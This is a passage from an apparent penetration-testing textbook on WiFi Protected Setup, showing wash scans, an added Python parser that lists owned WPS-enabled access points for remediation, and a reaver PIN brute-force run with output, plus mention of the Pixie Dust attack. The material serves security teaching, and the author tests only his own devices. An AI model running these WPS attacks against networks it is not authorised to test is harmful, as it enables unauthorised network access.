this is still radio. If you ever listen to an AM or FM radio station and you end up
hearing a second one at the same time, you’ll get the idea.
Figure 7-3. Kismet detecting wireless networks
All of this information is useful for further attack strategies. We will need to know things like the BSSID in order to perform attacks, since that’s how we know we are talking to the right device.
WPS Attacks
One way of gaining access to a WiFi network, especially for those who don’t want to deal with the fuss of configuring the operating system by entering passwords or passphrases, is to use WiFi Protected Setup (WPS). WPS can use various mechanisms to associate a client with an AP, including providing a personal identification number (PIN), using a USB stick, or pushing a button on the AP. However, vulnerabilities are associated with WPS, which may allow an attacker to gain access to networks they shouldn’t get access to. As a result, it’s useful to scan for networks that may support WPS, since WPS is something that can be disabled.
The tool we are going to start looking at is wash. This tool lets us know whether WPS is enabled on an AP. It’s a simple tool to use: you run it by specifying an interface to scan on or by providing a capture file to look through. Example 7-1 shows a run of wash looking for networks in my vicinity that have WPS enabled. This is a simple run, though we could select specific channels.
WiFi Attacks and Testing Tools | 213
Example 7-1. Running wash to identify WPS-enabled APs
yazpistachio:root~# wash -i wlan0
Wash v1.6.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
-------------------------------------------------------------------------------
50:C7:BF:82:86:2C    5  -43  2.0  No   AtherosC  TP-Link_862C
C4:EA:1D:D3:78:39    6  -43  2.0  No   Broadcom  CenturyLink5191
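Because the point of scanning is to find WPS-enabled APs that can then have WPS disabled, it helps to turn the wash table into an inventory rather than reading it by eye. The following is an added example, not code from the book or from the wash project. It assumes wash output laid out as in Example 7-1 (a banner, a header row, a dashed separator, then one AP per line with the columns BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID, with the Vendor column populated). The sample text is constructed: its first two rows are taken from Example 7-1 and the third is a made-up row with a placeholder BSSID so the "Lck" (WPS locked) handling is exercised.

```python
"""Parse wash output into a list of WPS-enabled APs and a remediation list.

Added example (not from the book or the wash project). Assumes the wash 1.6.x
column layout shown in Example 7-1 and a populated Vendor column.
"""
import re
from dataclasses import dataclass

# Constructed sample of wash output. Rows 1-2 are from Example 7-1; row 3 is a
# constructed entry with a placeholder BSSID/vendor to show a locked AP.
SAMPLE_WASH_OUTPUT = """\
Wash v1.6.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
-------------------------------------------------------------------------------
50:C7:BF:82:86:2C    5  -43  2.0  No   AtherosC  TP-Link_862C
C4:EA:1D:D3:78:39    6  -43  2.0  No   Broadcom  CenturyLink5191
00:11:22:33:44:55   11  -70  2.0  Yes  ExampleV  Constructed Locked AP
"""

# A data row is recognised by a leading MAC address; banner, header and the
# separator line all fail this test and are skipped without special-casing.
BSSID_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


@dataclass(frozen=True)
class WpsAccessPoint:
    bssid: str
    channel: int
    signal_dbm: int
    wps_version: str
    locked: bool      # True when wash reports WPS as locked ("Lck" == Yes)
    vendor: str
    essid: str


def parse_wash_output(text: str) -> list[WpsAccessPoint]:
    """Return one WpsAccessPoint per data row of wash output.

    The first six columns are single tokens; the ESSID may contain spaces, so
    everything after the sixth column is joined back together as the ESSID.
    """
    aps = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not BSSID_RE.match(fields[0]):
            continue
        bssid, ch, dbm, wps, lck, vendor = fields[:6]
        aps.append(WpsAccessPoint(
            bssid=bssid.upper(),
            channel=int(ch),
            signal_dbm=int(dbm),
            wps_version=wps,
            locked=(lck.lower() == "yes"),
            vendor=vendor,
            essid=" ".join(fields[6:]),
        ))
    return aps


def remediation_list(aps, owned_bssids):
    """BSSIDs that are ours, advertise WPS and have not locked it.

    Only APs in 'owned_bssids' (the set under our administrative control) are
    reported; anything else is out of scope. APs already showing WPS locked are
    left off, since the radio side is not accepting WPS, though their
    configuration is still worth checking so WPS is disabled outright.
    """
    owned = {b.upper() for b in owned_bssids}
    return sorted(ap.bssid for ap in aps if ap.bssid in owned and not ap.locked)


if __name__ == "__main__":
    found = parse_wash_output(SAMPLE_WASH_OUTPUT)
    for ap in found:
        state = "locked" if ap.locked else "open"
        print(f"{ap.bssid}  ch {ap.channel:>2}  {ap.signal_dbm:>4} dBm  "
              f"WPS {ap.wps_version} {state:6}  {ap.essid}")
    # Only the two APs from Example 7-1 are ours; the constructed one is ignored.
    todo = remediation_list(found, {"50:C7:BF:82:86:2C", "C4:EA:1D:D3:78:39"})
    print("Disable WPS on:", ", ".join(todo))
```

Feeding it a real scan is a matter of `wash -i wlan0 > scan.txt` and passing the file contents to `parse_wash_output`; the ownership filter is what keeps the remediation list limited to networks you administer.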
Now we know that we have two devices in close proximity that support WPS for authentication. Fortunately, both of these devices are mine, which means I am free to perform testing against them. I have the BSSID, which I need in order to run additional attacks. We’re going to take a look at using the tool reaver to attempt to gain access to the AP. This Kali system is not associated to this network and AP. No authentication credentials have been passed between Kali and this AP. So, we’re going to try to use reaver to use WPS to get access. This is essentially a brute-force attack, and it’s easy to start. We need to provide the interface to use and also the BSSID. You can see the start of a run in Example 7-2.
Example 7-2. Using reaver to attempt authentication
yazpistachio:root~# reaver -i wlan0 -b 50:C7:BF:82:86:2C
Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from 50:C7:BF:82:86:2C
[+] Received beacon from 50:C7:BF:82:86:2C
[+] Vendor: AtherosC
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] Associated with 50:C7:BF:82:86:2C (ESSID: TP-Link_862C)
[+] 0.00% complete @ 2018-02-20 17:33:39 (0 seconds/pin)
Using reaver to get the WPS PIN can take several hours, depending on the characteristics of the hardware and the network you are attempting to communicate with. reaver is not the only attack tool that can be used against WPS-enabled devices. reaver works online, against the live AP, but if you need to get the PIN offline, you could use the Pixie Dust attack. This attack takes advantage of a lack of randomness in the values used to set up the encryption that passes between the AP and the client. To acquire the PIN using the Pixie Dust attack, you would need to have access to a successful connection.